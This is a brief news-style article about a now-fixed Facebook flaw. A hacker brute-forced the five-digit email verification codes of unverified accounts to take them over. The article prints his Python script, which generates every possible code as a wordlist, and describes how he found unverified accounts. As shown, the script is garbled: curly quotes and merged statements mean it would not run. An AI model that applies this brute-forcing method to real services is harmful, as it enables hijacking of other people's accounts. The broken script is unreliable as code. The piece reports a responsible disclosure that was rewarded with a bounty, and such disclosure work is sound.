Many Hackers able to find bugs inside Facebook that could allow them to hack a Facebook account, and again in the hacking world, one of the Indian hacker able to make a facebook hacking tool that was able to hack any newly created Facebook accounts.
Hacker named “Abhibandu” demonstrated on his personal blog ‘How i hacked your unverified Facebook accounts.’
What is the process?
For a new account you have to signup over there and Facebook sends a verification code on to your email account and Abhibandu made a handsome code to easily crack that code in just 15 minutes.
Abhibandu’s Python Script that could hack a newly created Facebook accounts:
#!/usr/bin/env python
def add_zeros(end,tot):
zeros=”
while (len(zeros)<(len(tot)-len(end))):
zeros=zeros+’0′
return zeros+endverification_code=5
code=”
path=raw_input(” where do you want to store your dictionary file. eg. D:\derp\foo.txt “)
loop_range=verification_code-len(code)
nines=”
for i in range(0,loop_range):
nines=nines+’9′
nine=int(nines)fob=open(path,’w’)
for i in range(0,nine+1):
j=str(i)
if len(j)<len(nines):
j=add_zeros(j,nines)
number=code+j+’\n’
fob.write(number)
fob.close()
print ‘Generated and Saved!’
This attack could takeover on those Facebook accounts that doesn’t verified their accounts, so the next question is—how can we find an account which is unverified?
Abhibandu was able to do so either by guessing with an email address until Facebook asked to confirm the account, or by searching for emails on Facebook to see if they were verified. Either way, it wasn’t too hard for Abhibandu.
At Last, Abhibandu reported the hack to Facebook and within eight hours, he got a response from the fb security team. In the meantime this loop hole has been fixed by Facebook and Abhibandu received a nice bounty payout for notifying Facebook.
